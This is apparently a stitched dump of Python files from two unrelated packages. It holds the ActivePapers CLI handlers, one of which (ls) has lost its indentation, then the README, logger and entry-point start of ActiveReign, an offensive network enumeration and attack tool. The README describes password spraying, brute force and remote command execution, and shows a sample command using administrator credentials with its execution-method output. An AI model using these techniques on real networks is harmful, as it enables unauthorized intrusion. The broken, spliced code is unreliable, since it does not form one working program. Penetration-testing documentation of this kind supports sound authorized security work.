# Inverse mapping: file extension -> language.
file_languages = dict((_ext, _l)
                      for (_t, _l), _ext in file_extensions.items())
def extract_to_file(paper, item, file=None, filename=None, directory=None):
    """Write the contents of *item* to a plain file.

    Either an open *file* object is given, or a *filename* and/or
    *directory* from which the destination path is derived. Returns
    the filename when one was used.
    """
    if file is None:
        if filename is not None:
            filename = os.path.abspath(filename)
        if directory is not None:
            directory = os.path.abspath(directory)
        if filename is not None and directory is not None:
            if not filename.startswith(directory):
                # Fixed format string: it previously read
                # "% not in directory %s" and crashed while
                # formatting the error message.
                raise ValueError("%s not in directory %s"
                                 % (filename, directory))
        if filename is None:
            item_name = item.name.split('/')[1:]
            filename = os.path.join(directory, *item_name)
            if '.' not in item_name[-1]:
                # Add a file extension using some heuristics
                language = item.attrs.get('ACTIVE_PAPER_LANGUAGE', None)
                filename += file_extensions.get((datatype(item), language), '')
        directory, _ = os.path.split(filename)
        if directory and not os.path.exists(directory):
            os.makedirs(directory)
        file = open(filename, 'wb')
        close = True
    else:
        # If a file object is given, no other file specification is allowed
        assert filename is None
        assert directory is None
        close = False
    dt = datatype(item)
    if dt in ['file', 'text']:
        internal = activepapers.storage.InternalFile(item, 'rb')
        file.write(internal.read())
    elif dt in extractable_types:
        file.write(item[...].flat[0])
    else:
        raise ValueError("cannot extract dataset %s of type %s"
                         % (item.name, dt))
    if close:
        file.close()
        # Give the extracted file the item's modification time.
        mtime = mod_time(item)
        if mtime:
            os.utime(filename, (mtime, mtime))
    return filename
def update_from_file(paper, filename, type=None,
                     force_update=False, dry_run=False,
                     dataset_name=None, create_new=True):
    """Create or update an item in *paper* from the plain file
    *filename*.

    The target item is *dataset_name* if given, otherwise derived from
    the filename (with the extension stripped for code/text items).
    Existing items are only replaced when the file is newer, unless
    *force_update* is set. With *dry_run*, actions are printed instead
    of performed.
    """
    if not os.path.exists(filename):
        raise ValueError("File %s not found" % filename)
    mtime = os.path.getmtime(filename)
    basename = filename
    ext = ''
    if dataset_name is not None:
        item = paper.file.get(dataset_name, None)
        if item is not None:
            basename = item.name
    else:
        item = paper.file.get(basename, None)
        if item is None:
            # Try again with the file extension stripped.
            basename, ext = os.path.splitext(filename)
            item = paper.file.get(basename, None)
    language = file_languages.get(ext, None)
    if item is None:
        if not create_new:
            return
        # Create new item
        if type is None:
            raise ValueError("Datatype required to create new item %s"
                             % basename)
        # Validate that the target path matches the datatype's section.
        if type in ['calclet', 'importlet', 'module']:
            if not basename.startswith('code/'):
                raise ValueError("Items of type %s must be"
                                 " in the code section"
                                 % type)
            if language != 'python':
                raise ValueError("Items of type %s must be Python code"
                                 % type)
            if type == 'module' and \
               not basename.startswith('code/python-packages/'):
                raise ValueError("Items of type %s must be in"
                                 "code/python-packages"
                                 % type)
        elif type == 'file':
            if not basename.startswith('data/') \
               and not basename.startswith('documentation/'):
                raise ValueError("Items of type %s must be"
                                 " in the data or documentation section"
                                 % type)
            basename += ext
        elif type == 'text':
            if not basename.startswith('documentation/'):
                raise ValueError("Items of type %s must be"
                                 " in the documentation section"
                                 % type)
    else:
        # Update existing item
        if mtime <= mod_time(item) and not force_update:
            if dry_run:
                sys.stdout.write("Skip %s: file %s is not newer\n"
                                 % (item.name, filename))
            return
        if type is not None and type != datatype(item):
            raise ValueError("Cannot change datatype %s to %s"
                             % (datatype(item), type))
        if type is None:
            type = datatype(item)
        if language is None:
            language = item.attrs.get('ACTIVE_PAPER_LANGUAGE', None)
        if dry_run:
            sys.stdout.write("Delete %s\n" % item.name)
        else:
            del item.parent[item.name.split('/')[-1]]
    if dry_run:
        fulltype = type if language is None else '/'.join((type, language))
        sys.stdout.write("Create item %s of type %s from file %s\n"
                         % (basename, fulltype, filename))
    else:
        if type in ['calclet', 'importlet', 'module']:
            # basename starts with 'code/'; strip that prefix because
            # store_python_code resolves relative to the code group.
            code = open(filename, 'rb').read().decode('utf-8')
            item = paper.store_python_code(basename[5:], code)
            stamp(item, type, {})
            timestamp(item, mtime)
        elif type in ['file', 'text']:
            f = paper.open_internal_file(basename, 'w')
            f.write(open(filename, 'rb').read())
            f.close()
            stamp(f._ds, type, {'ACTIVE_PAPER_LANGUAGE': language})
            timestamp(f._ds, mtime)
def directory_pattern(pattern):
    """Return a glob pattern matching the contents of the directory
    named by *pattern*, or None if *pattern* cannot name a directory
    (it is empty, or ends in a wildcard or a slash)."""
    # Guard against an empty pattern, for which pattern[-1] would raise
    # an IndexError.
    if not pattern or pattern[-1] in "?*/":
        return None
    return pattern + "/*"
def process_patterns(patterns):
    """Compile shell-style *patterns* (each augmented with a pattern
    for the contents of a directory of that name) into regular
    expressions; None passes through unchanged."""
    if patterns is None:
        return None
    expanded = []
    for p in patterns:
        expanded.append(p)
        expanded.append(directory_pattern(p))
    return [re.compile(fnmatch.translate(p))
            for p in expanded
            if p is not None]
#
# Command handlers called from argparse
#
def create(paper, d=None):
    """Create a new, empty ActivePaper file named *paper*, declaring
    the external dependencies listed in *d*."""
    if paper is None:
        sys.stderr.write("no paper given\n")
        raise CLIExit
    new_paper = activepapers.storage.ActivePaper(paper, 'w', d)
    new_paper.close()
def ls(paper, long, type, pattern):
paper = get_paper(paper)
paper = activepapers.storage.ActivePaper(paper, 'r')
pattern = process_patterns(pattern)
for item in paper.iter_items():
name = item.name[1:] # remove initial slash
dtype = datatype(item)
if item.attrs.get('ACTIVE_PAPER_DUMMY_DATASET', False):
dtype = 'dummy'
if pattern and \
not any(p.match(name) for p in pattern):
continue
if type is not None and dtype != type:
continue
if long:
t = item.attrs.get('ACTIVE_PAPER_TIMESTAMP', None)
if t is None:
sys.stdout.write(21*" ")
else:
sys.stdout.write(time.strftime("%Y-%m-%d/%H:%M:%S ",
time.localtime(t/1000.)))
field_len = len("importlet ") # the longest data type name
sys.stdout.write((dtype + field_len*" ")[:field_len])
sys.stdout.write('*' if paper.is_stale(item) else ' ')
sys.stdout.write(name)
sys.stdout.write('\n')
paper.close()
def rm(paper, force, pattern):
    """
    Delete items matching *pattern* from the paper, together with every
    item that depends on them (transitive closure over the dependency
    graph). Asks for confirmation unless *force* is true.
    """
    paper_name = get_paper(paper)
    # First pass (read-only): collect the names of all matching items.
    paper = activepapers.storage.ActivePaper(paper_name, 'r')
    deps = paper.dependency_graph()
    pattern = process_patterns(pattern)
    if not pattern:
        return
    names = set()
    for item in it.chain(paper.iter_items(), paper.iter_groups()):
        if any(p.match(item.name[1:]) for p in pattern):
            names.add(item.name)
    paper.close()
    if not names:
        return
    # Extend the selection with dependent items until a fixed point is
    # reached, so no dangling dependencies are left behind.
    while True:
        new_names = set()
        for name in names:
            for dep in deps[name]:
                new_names.add(dep)
        if new_names - names:
            names |= new_names
        else:
            break
    names = sorted(names)
    if not force:
        for name in names:
            sys.stdout.write(name + '\n')
        # Python 2/3 compatibility for the confirmation prompt.
        try:
            _input = raw_input
        except NameError:
            _input = input
        while True:
            reply = _input("Delete ? (y/n) ")
            # Require an explicit answer. The previous membership test
            # (reply in "yn") accepted an empty reply, which then fell
            # through to the deletion below.
            if reply in ('y', 'n'):
                break
        if reply == 'n':
            return
    # Second pass (read-write): perform the deletions. Items inside an
    # already-deleted group are skipped.
    paper = activepapers.storage.ActivePaper(paper_name, 'r+')
    most_recent_group = None
    for name in names:
        if most_recent_group and name.startswith(most_recent_group):
            continue
        if isinstance(paper.file[name], h5py.Group):
            most_recent_group = name
        try:
            del paper.file[name]
        except Exception:
            sys.stderr.write("Can't delete %s\n" % name)
    paper.close()
def dummy(paper, force, pattern):
    """
    Replace items matching *pattern* by dummy datasets. Asks for
    confirmation unless *force* is true.
    """
    paper_name = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper_name, 'r')
    # NOTE(review): the dependency graph is computed but never consulted
    # here (unlike in rm()); kept in case dependency_graph() has side
    # effects — TODO confirm and remove if it does not.
    deps = paper.dependency_graph()
    pattern = process_patterns(pattern)
    if not pattern:
        return
    names = set()
    for item in paper.iter_items():
        if any(p.match(item.name[1:]) for p in pattern):
            names.add(item.name)
    paper.close()
    if not names:
        return
    names = sorted(names)
    if not force:
        for name in names:
            sys.stdout.write(name + '\n')
        # Python 2/3 compatibility for the confirmation prompt.
        try:
            _input = raw_input
        except NameError:
            _input = input
        while True:
            reply = _input("Replace by dummy datasets? (y/n) ")
            # Require an explicit answer; an empty reply used to pass the
            # old membership test (reply in "yn") and count as a 'yes'.
            if reply in ('y', 'n'):
                break
        if reply == 'n':
            return
    paper = activepapers.storage.ActivePaper(paper_name, 'r+')
    for name in names:
        try:
            paper.replace_by_dummy(name)
        except Exception:
            sys.stderr.write("Can't replace %s by dummy\n" % name)
            raise
    paper.close()
def set_(paper, dataset, expr):
    """
    Set *dataset* to the value obtained by evaluating *expr* in the
    numpy namespace, replacing any existing dataset of that name.

    SECURITY NOTE: *expr* comes straight from the command line and is
    evaluated with eval(); this is a deliberate CLI feature, so only
    pass trusted expressions.
    """
    paper = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper, 'r+')
    value = eval(expr, numpy.__dict__, {})
    try:
        del paper.data[dataset]
    except KeyError:
        pass
    paper.data[dataset] = value
    paper.close()
def group(paper, group_name):
    """Create a new empty group; only allowed below code/, data/ or documentation/."""
    if group_name.startswith('/'):
        group_name = group_name[1:]
    allowed = ('code', 'data', 'documentation')
    if group_name.split('/')[0] not in allowed:
        sys.stderr.write("invalid group name %s\n" % group_name)
        raise CLIExit
    ap = activepapers.storage.ActivePaper(get_paper(paper), 'r+')
    ap.file.create_group(group_name)
    ap.close()
def extract(paper, dataset, filename):
    """Extract *dataset* from the paper into *filename* ('-' writes to stdout)."""
    paper = activepapers.storage.ActivePaper(get_paper(paper), 'r')
    ds = paper.file[dataset]
    try:
        if filename == '-':
            extract_to_file(paper, ds, file=sys.stdout)
        else:
            extract_to_file(paper, ds, filename=filename)
    except ValueError as exc:
        sys.stderr.write(exc.args[0] + '\n')
        raise CLIExit
def _script(paper, dataset, filename, run, create_method):
    """
    Store the script file *filename* in the paper as codelet *dataset*
    using *create_method* ('create_calclet' or 'create_importlet'),
    then run it if *run* is true.
    """
    paper = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper, 'r+')
    # Close the script file deterministically instead of relying on GC.
    with open(filename) as script_file:
        script = script_file.read()
    codelet = getattr(paper, create_method)(dataset, script)
    if run:
        codelet.run()
    paper.close()
def calclet(paper, dataset, filename, run):
    """Store *filename* as calclet *dataset*; run it if *run* is true."""
    _script(paper, dataset, filename, run, "create_calclet")
def importlet(paper, dataset, filename, run):
    """Store *filename* as importlet *dataset*; run it if *run* is true."""
    _script(paper, dataset, filename, run, "create_importlet")
def import_module(paper, module):
    """Import the Python module *module* into the paper's code section."""
    ap = activepapers.storage.ActivePaper(get_paper(paper), 'r+')
    ap.import_module(module)
    ap.close()
def run(paper, codelet, debug, profile, checkin):
    """
    Run *codelet* inside the paper. With *checkin*, first update the
    paper's code items from the files under the local 'code' directory.
    With *profile*, profile the run with cProfile and dump the stats to
    the given file.
    """
    paper = get_paper(paper)
    with activepapers.storage.ActivePaper(paper, 'r+') as paper:
        if checkin:
            # Check in every file below ./code before running.
            for root, dirs, files in os.walk('code'):
                for f in files:
                    filename = os.path.join(root, f)
                    try:
                        update_from_file(paper, filename)
                    except ValueError as exc:
                        sys.stderr.write(exc.args[0] + '\n')
        try:
            if profile is None:
                exc = paper.run_codelet(codelet, debug)
            else:
                import cProfile, pstats
                pr = cProfile.Profile()
                pr.enable()
                exc = paper.run_codelet(codelet, debug)
                pr.disable()
                ps = pstats.Stats(pr)
                ps.dump_stats(profile)
        except KeyError:
            sys.stderr.write("Codelet %s does not exist\n" % codelet)
            raise CLIExit
        # A non-None return value is written to stderr — presumably a
        # formatted error report from run_codelet; confirm in storage.
        if exc is not None:
            sys.stderr.write(exc)
def _find_calclet_for_dummy_or_stale_item(paper_name):
    """
    Return (calclet, item_name) for the first dummy or stale item found
    in the paper's dependency hierarchy, or (None, None) if everything
    is up to date.
    """
    paper = activepapers.storage.ActivePaper(paper_name, 'r')
    deps = paper.dependency_hierarchy()
    next(deps) # the first set has no dependencies
    calclet = None
    item_name = None
    for item_set in deps:
        for item in item_set:
            if paper.is_dummy(item) or paper.is_stale(item):
                item_name = item.name
                calclet = item.attrs['ACTIVE_PAPER_GENERATING_CODELET']
                break
        # We must del item_set to prevent h5py from crashing when the
        # file is closed. Presumably there are HDF5 handles being freed
        # as a consequence of the del.
        del item_set
        if calclet is not None:
            break
    paper.close()
    return calclet, item_name
def update(paper, verbose):
    """
    Repeatedly re-run generating codelets until the paper contains no
    stale or dummy datasets.
    """
    paper_name = get_paper(paper)
    while True:
        calclet, item_name = _find_calclet_for_dummy_or_stale_item(paper_name)
        if calclet is None:
            break
        if verbose:
            sys.stdout.write("Dataset %s is stale or dummy, running %s\n"
                             % (item_name, calclet))
            sys.stdout.flush()
        ap = activepapers.storage.ActivePaper(paper_name, 'r+')
        ap.run_codelet(calclet)
        ap.close()
def checkin(paper, type, file, force, dry_run):
    """
    Store files from the working directory in the paper. Directories are
    walked recursively. *type* forces the item type, *force* overwrites
    more recent items, *dry_run* only reports what would be done.

    Note: *type* and *file* mirror the CLI option names and shadow builtins.
    """
    paper = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper, 'r+')
    cwd = os.path.abspath(os.getcwd())
    for filename in file:
        filename = os.path.abspath(filename)
        # Only files below the working directory can be checked in: the
        # in-paper name is derived from the path relative to cwd.
        if not filename.startswith(cwd):
            sys.stderr.write("File %s is not in the working directory\n"
                             % filename)
            raise CLIExit
        filename = filename[len(cwd)+1:]
        # Local helper; intentionally distinct from the module-level
        # update() command handler.
        def update(filename):
            try:
                update_from_file(paper, filename, type, force, dry_run)
            except ValueError as exc:
                sys.stderr.write(exc.args[0] + '\n')
        if os.path.isdir(filename):
            for root, dirs, files in os.walk(filename):
                for f in files:
                    update(os.path.join(root, f))
        else:
            update(filename)
    paper.close()
def checkout(paper, type, pattern, dry_run):
    """
    Extract items from the paper into files under the current directory,
    optionally filtered by datatype and name patterns. Items whose
    datatype cannot be mapped to a file are skipped with a message.

    NOTE(review): *dry_run* is accepted but not used in this function.
    """
    paper = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper, 'r')
    pattern = process_patterns(pattern)
    for item in paper.iter_items():
        name = item.name[1:] # remove initial slash
        dtype = datatype(item)
        if pattern and \
           not any(p.match(name) for p in pattern):
            continue
        if type is not None and dtype != type:
            continue
        try:
            extract_to_file(paper, item, directory=os.getcwd())
        except ValueError:
            sys.stderr.write("Skipping %s: data type %s not extractable\n"
                             % (item.name, datatype(item)))
    paper.close()
def ln(paper, reference, name):
    """Create link item *name* for an external reference 'type:name:path'."""
    parts = reference.split(':')
    if len(parts) != 3:
        sys.stderr.write('Invalid reference %s\n' % reference)
        raise CLIExit
    ref_type, ref_name, ref_path = parts
    if ref_path == '':
        ref_path = None
    with activepapers.storage.ActivePaper(get_paper(paper), 'r+') as paper:
        paper.create_ref(name, ref_type + ':' + ref_name, ref_path)
def cp(paper, reference, name):
    """Copy an external reference 'type:name:path' into the paper as *name*."""
    parts = reference.split(':')
    if len(parts) != 3:
        sys.stderr.write('Invalid reference %s\n' % reference)
        raise CLIExit
    ref_type, ref_name, ref_path = parts
    if ref_path == '':
        ref_path = None
    with activepapers.storage.ActivePaper(get_paper(paper), 'r+') as paper:
        paper.create_copy(name, ref_type + ':' + ref_name, ref_path)
def refs(paper, verbose):
    """
    List the external references used by the paper. With *verbose*, also
    show which items link to or copy each reference.
    """
    paper = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper, 'r')
    refs = paper.external_references()
    paper.close()
    sorted_refs = sorted(refs.keys())
    for ref in sorted_refs:
        # Reference names come back as bytes and must be decoded.
        sys.stdout.write(ref.decode('utf-8') + '\n')
        if verbose:
            links, copies = refs[ref]
            if links:
                sys.stdout.write("  links:\n")
                for l in links:
                    sys.stdout.write("    %s\n" % l)
            if copies:
                sys.stdout.write("  copies:\n")
                for c in copies:
                    sys.stdout.write("    %s\n" % c)
def edit(paper, dataset):
    """
    Extract *dataset* to a temporary file, open it in $EDITOR (default
    vi), and check it back into the paper if the editor exits cleanly.
    """
    editor = os.getenv("EDITOR", "vi")
    paper_name = get_paper(paper)
    with tempdir.TempDir() as t:
        paper = activepapers.storage.ActivePaper(paper_name, 'r')
        ds = paper.file[dataset]
        try:
            filename = extract_to_file(paper, ds, directory=str(t))
        except ValueError as exc:
            sys.stderr.write(exc.args[0] + '\n')
            raise CLIExit
        finally:
            paper.close()
        ret = subprocess.call([editor, filename])
        # Only write back if the editor exited successfully.
        if ret == 0:
            paper = activepapers.storage.ActivePaper(paper_name, 'r+')
            try:
                update_from_file(paper, filename,
                                 dataset_name=dataset, create_new=False)
            finally:
                paper.close()
def console(paper, modify):
    """
    Open an interactive Python console with the paper's data group bound
    to the name 'data'. With *modify*, the paper is opened read-write.
    """
    import code
    paper = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper, 'r+' if modify else 'r')
    # The console namespace only needs 'data'; the previously assigned
    # local variable of the same name was unused and has been removed.
    environment = {'data': paper.data}
    code.interact(banner = "ActivePapers interactive console",
                  local = environment)
    paper.close()
def ipython(paper, modify):
    """
    Open an IPython shell on the paper. The local variable 'data' is
    bound to the paper's data group so that it is available inside the
    embedded session (IPython.embed exposes the caller's locals).
    """
    import IPython
    paper = get_paper(paper)
    paper = activepapers.storage.ActivePaper(paper, 'r+' if modify else 'r')
    data = paper.data
    IPython.embed()
    paper.close()
# ActiveReign
<p align="center">
<img src="https://user-images.githubusercontent.com/13889819/62736481-6f7e7880-b9fb-11e9-92d6-47b650fdb84b.png"/>
<br>
<img src="https://img.shields.io/badge/Python-3.7-blue.svg"/>
<img src="https://img.shields.io/badge/License-GPLv3-green.svg">
<a href="https://www.youtube.com/channel/UC6-HLpd0rpPXmpJIhED8qTw">
<img src="https://img.shields.io/badge/Demo-Youtube-red.svg"/></a>
<a href="https://twitter.com/intent/follow?screen_name=m8r0wn">
<img src="https://img.shields.io/twitter/follow/m8r0wn?style=social&logo=twitter" alt="follow on Twitter"></a>
</p>
### Background
A while back I was challenged to write a discovery tool with Python3 that could automate the process of finding sensitive information on network file shares. After writing the entire tool with pysmb, and adding features such as the ability to open and scan docx and xlsx files, I slowly started adding functionality from the awesome [Impacket](https://github.com/SecureAuthCorp/impacket) library; just simple features I wanted to see in an internal penetration testing tool. The more I added, the more it looked like a Python3 rewrite of [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) created from scratch.
If you are doing a direct comparison, [CME](https://github.com/byt3bl33d3r/CrackMapExec) is an amazing tool that has way more features than are currently implemented here. However, I added a few new features and modifications that may come in handy during an assessment.
### For more documentation checkout the project [wiki](https://github.com/m8r0wn/ActiveReign/wiki)
### Operational Modes
* db    - Query or insert values into the ActiveReign database
* enum - System enumeration & module execution
* shell - Spawn a simulated shell on the target system and perform command execution
* spray - Domain password spraying and brute force
* query - Perform LDAP queries on the domain
### Key Features
* Automatically extract domain information via LDAP and incorporate into network enumeration.
* Perform Domain password spraying using LDAP to remove users close to lockout thresholds.
* Local and remote command execution, for use on multiple starting points throughout the network.
* Simulated interactive shell on target system, with file upload and download capabilities.
* Data discovery capable of scanning xlsx and docx files.
* Various modules to add and extend capabilities.
### Acknowledgments
There were many intended and unintended contributors that made this project possible. If I am missing any, I apologize, it was in no way intentional. Feel free to contact me and we can make sure they get the credit they deserve ASAP!
* [@byt3bl33d3r](https://github.com/byt3bl33d3r) - [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
* [@SecureAuthCorp](https://github.com/SecureAuthCorp) - [Impacket](https://github.com/SecureAuthCorp/impacket)
* [@the-useless-one](https://github.com/the-useless-one) - [pywerview](https://github.com/the-useless-one/pywerview)
* [@dirkjanm](https://github.com/dirkjanm) - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
### Final Thoughts
Writing this tool and testing on a variety of networks/systems has taught me that execution method matters, and depends on the configuration of the system. If a specific module or feature does not work, determine if it is actually the program, target system, configuration, or even network placement before creating an issue.
To help this investigation process, I have created a ```test_execution``` module to run against a system with known admin privileges. This will cycle through all execution methods and provide a status report to determine the best method to use:
```bash
$ activereign enum -u administrator -p Password123 --local-auth -M test_execution 192.168.1.1
[*] Lockout Tracker Threshold extracted from database: 5
[*] Enum Authentication \administrator (Password: P****) (Hash: False)
[+] DC01 192.168.1.1 ENUM Windows Server 2008 R2 Standard 7601 Service Pack 1 (Domain: DEMO) (Signing: True) (SMBv1: True) (Adm!n)
[*] DC01 192.168.1.1 TEST_EXECUTION Testing execution methods
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: WMIEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: SMBEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: ATEXEC Fileless: SUCCESS Remote (Defualt): SUCCESS
[*] DC01 192.168.1.1 TEST_EXECUTION Execution Method: WINRM Fileless: N/A Remote (Defualt): SUCCESS
``` | ActiveReign | /ActiveReign-1.0.5.tar.gz/ActiveReign-1.0.5/README.md | README.md |
import os
import sys
import logging
# ANSI SGR (Select Graphic Rendition) code fragments. code_gen() combines
# one entry from each of the three tables below into a terminal escape
# sequence such as '\033[01;31m'. The 'None' key selects "no effect".

# Text styles (first SGR parameter).
STYLE = {
    'None' : '0',
    'bold' : '1',
    'disable' : '2',
    'underline' : '4',
    'blink' : '5',
    'reverse' : '7',
    'invisible' : '8',
    'strike' : '9',
}

# Foreground colors (30-39 range).
COLOR = {
    'None' : '',
    'gray' : ';30',
    'red' : ';31',
    'green' : ';32',
    'yellow': ';33',
    'blue' : ';34',
    'purple': ';35',
    'cyan' : ';36',
    'white' : ';39',
}

# Background colors (40-47 range).
HIGHLIGHT = {
    'None' : '',
    'black' : ';40',
    'red' : ';41',
    'green' : ';42',
    'orange': ';43',
    'blue' : ';44',
    'purple': ';45',
    'cyan' : ';46',
    'gray' : ';47',
}
class AR3Adapter(logging.LoggerAdapter):
    """
    LoggerAdapter that renders console messages with ANSI colors and
    status bullets ([*], [+], [-], ...). Messages may be plain strings or
    lists of fields, which msg_spacing() pads into fixed-width columns.
    """
    # Column widths applied by msg_spacing() when a message is a list.
    __FORMATTER = {
        0: '{:<28}', # Hostname
        1: '{:<16}', # IP
        2: '{:<28} ', # Data label
        3: '{:<57}', # os/data
        4: '{:<20}', # Domain/data cont.
        5: '{:<17}', # Signing
        6: '{:<14}', # SMBv1
    }

    def __init__(self, logger_name='ar3'):
        # NOTE: the base LoggerAdapter.__init__ is deliberately not
        # called; only self.logger is used by the methods below.
        self.logger = logging.getLogger(logger_name)

    def msg_spacing(self, data):
        """Pad a list message into aligned columns; non-lists pass through."""
        if type(data) != list:
            return data
        tmp_data = ''
        spacer = 0
        for value in data:
            try:
                # Column 2 (the data label) is additionally colorized.
                if spacer == 2:
                    tmp_data += (self.__FORMATTER[spacer].format(highlight(value, color='blue', style='bold')) + ' ')
                else:
                    tmp_data += (self.__FORMATTER[spacer].format(value) + ' ')
            except Exception as e:
                # Fields beyond the known columns are appended unpadded.
                tmp_data += '{} '.format(value)
            spacer += 1
        return tmp_data

    def process(self, msg, kwargs, color='blue', highlight='None', style='bold', bullet=''):
        # Backwards compatible with any logging methods not defined
        # NOTE: the 'highlight' parameter shadows the module-level
        # highlight() helper inside this method.
        if not bullet:
            return msg, kwargs
        msg = self.msg_spacing(msg)
        return("{}{}\033[0m {}".format(code_gen(style, color, highlight), bullet, msg), kwargs)

    def info(self, msg, *args, **kwargs):
        # Blue [*] bullet.
        msg, kwargs = self.process(msg, kwargs, color='blue', highlight='None', style='bold', bullet='[*]')
        self.logger.info(msg, *args, **kwargs)

    def output(self, msg, *args, **kwargs):
        # Raw output: no bullet, no coloring.
        self.logger.info(msg, *args, **kwargs)

    def success(self, msg, *args, **kwargs):
        # Green [+] bullet.
        msg, kwargs = self.process(msg, kwargs, color='green', highlight='None', style='bold', bullet='[+]')
        self.logger.info(msg, *args, **kwargs)

    def success2(self, msg, *args, **kwargs):
        # Yellow [+] bullet.
        msg, kwargs = self.process(msg, kwargs, color='yellow', highlight='None', style='bold', bullet='[+]')
        self.logger.info(msg, *args, **kwargs)

    def fail(self, msg, *args, **kwargs):
        # Red [-] bullet.
        msg, kwargs = self.process(msg, kwargs, color='red', highlight='None', style='bold', bullet='[-]')
        self.logger.info(msg, *args, **kwargs)

    def status(self, msg, *args, **kwargs):
        # Blue bullet followed by gray message text.
        msg = self.msg_spacing(msg)
        msg = "{}[*] \033[1;30m{}\033[0m".format(code_gen('bold', 'blue', 'None'), msg)
        self.logger.info(msg, *args, **kwargs)

    def status_success(self, msg, *args, **kwargs):
        # Green bullet followed by gray message text.
        msg = self.msg_spacing(msg)
        msg = "{}[+] \033[1;30m{}\033[0m".format(code_gen('bold', 'green', 'None'), msg)
        self.logger.info(msg, *args, **kwargs)

    def status_success2(self, msg, *args, **kwargs):
        # Yellow bullet followed by gray message text.
        msg = self.msg_spacing(msg)
        msg = "{}[+] \033[1;30m{}\033[0m".format(code_gen('bold', 'yellow', 'None'), msg)
        self.logger.info(msg, *args, **kwargs)

    def status_fail(self, msg, *args, **kwargs):
        # Red bullet followed by gray message text.
        msg = self.msg_spacing(msg)
        msg = "{}[-] \033[1;30m{}\033[0m".format(code_gen('bold', 'red', 'None'), msg)
        self.logger.info(msg, *args, **kwargs)

    def warning(self, msg, *args, **kwargs):
        # Purple [!] bullet.
        msg, kwargs = self.process(msg, kwargs, color='purple', highlight='None', style='bold', bullet='[!]')
        self.logger.warning(msg, *args, **kwargs)

    def verbose(self, msg, *args, **kwargs):
        # @TODO At some point create a new log level "verbose" to print failure messages
        msg, kwargs = self.process(msg, kwargs, color='red', highlight='None', style='bold', bullet='[-]')
        self.logger.debug(msg, *args, **kwargs)

    def debug(self, msg, *args, **kwargs):
        # Cyan [D] bullet.
        msg, kwargs = self.process(msg, kwargs, color='cyan', highlight='None', style='bold', bullet='[D]')
        self.logger.debug(msg, *args, **kwargs)
def setup_logger(log_level=logging.INFO, logger_name='ar3'):
    """
    Configure the console logger (plain messages to stdout) and return
    an AR3Adapter wrapping it.
    """
    formatter = logging.Formatter('%(message)s')
    # Renamed from 'StreamHandler', which shadowed logging.StreamHandler.
    stream_handler = logging.StreamHandler(sys.stdout)
    stream_handler.setFormatter(formatter)
    logger = logging.getLogger(logger_name)
    logger.propagate = False
    logger.addHandler(stream_handler)
    logger.setLevel(log_level)
    # Forward logger_name so a non-default name wraps the same logger
    # that was just configured (previously the adapter always used 'ar3').
    return AR3Adapter(logger_name)
def setup_file_logger(workspace, log_name, log_level=logging.INFO, ext='.csv'):
    """Create a logger writing plain messages to a file in the workspace dir."""
    log_path = setup_log_file(workspace, log_name, ext)
    handler = logging.FileHandler(log_path)
    handler.setFormatter(logging.Formatter("%(message)s"))
    file_logger = logging.getLogger(log_name)
    file_logger.addHandler(handler)
    file_logger.setLevel(log_level)
    return file_logger
def setup_outfile_logger(filename, log_name, log_level=logging.INFO):
    """Create a logger writing plain messages to a user-chosen output file."""
    # User defined output files, not required under workspace context
    handler = logging.FileHandler(filename)
    handler.setFormatter(logging.Formatter("%(message)s"))
    out_logger = logging.getLogger(log_name)
    out_logger.addHandler(handler)
    out_logger.setLevel(log_level)
    return out_logger
def setup_log_file(workspace, log_name, ext='.csv'):
    """Return the log file path inside the workspace dir, creating the dir if needed."""
    base = os.path.join(os.path.expanduser('~'), '.ar3', 'workspaces', workspace)
    if not os.path.exists(base):
        os.makedirs(base)
    return '{}/{}{}'.format(base, log_name, ext)
def print_args(args, logger):
    """Log every non-None parsed CLI argument at debug level."""
    for key, value in args.__dict__.items():
        if value is not None:
            logger.debug(['args.{}'.format(key), '::: {}'.format(value)])
def code_gen(style, color, highlight):
    """Outside logger adapter to be called from other places, aka highlighting"""
    # Compose one ANSI escape sequence from the three lookup tables.
    return '\033[0{}{}{}m'.format(STYLE[style], COLOR[color], HIGHLIGHT[highlight])
def highlight(data, color='blue', style='bold', highlight='None'):
    """Wrap *data* in ANSI formatting codes, resetting attributes afterwards."""
    prefix = code_gen(style, color, highlight)
    return "{}{}\033[0m".format(prefix, data)
import logging
import argparse
from sys import exit, argv
from importlib import import_module
from ar3 import logger
from ar3.first_run import *
from ar3.ops.db.db_core import Ar3db
from ar3.loaders.config_loader import ConfigLoader
from ar3.ops.db.arg_parser import db_args, db_arg_mods
from ar3.ops.enum.arg_parser import enum_args, enum_arg_mods
from ar3.ops.spray.arg_parser import spray_args, spray_arg_mods
from ar3.ops.query.arg_parser import query_args, query_arg_mods
from ar3.ops.shell.arg_parser import shell_args, shell_arg_mods
def banner():
    """Return the ASCII-art banner (with version) used as the CLI description."""
    VERSION = "v1.0.5"
    BANNER = """
       _____
      /\ _ ({0}) | __ \ ({0})
     / \ ___| |_ ___ _____| |__) |___ _ __ _ _ __
    / /\ \ / __| __| \ \ / / _ \ _ // _ \ |/ _` | '_ \
   / ____ \ (__| |_| |\ V / __/ | \ \ __/ | (_| | | | |
  /_/ \_\___|\__|_| \_/ \___|_| \_\___|_|\__, |_| |_|
                                          __/ |
                                         |___/
    \033[1;33mA network enumeration and attack toolset\033[1;m
    {1}
    """.format("\033[1;30mX\033[1;m", VERSION)
    return BANNER
def main():
    """
    CLI entry point: build the argument parser, set up loggers, config,
    workspace and database, then dispatch to the selected operational
    mode's arg_mods() and main().
    """
    main_parser = argparse.ArgumentParser(description=banner(), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
    main_parser._optionals.title = 'Optional Arguments\n\033[1;30m>>-------------------->\033[1;m'
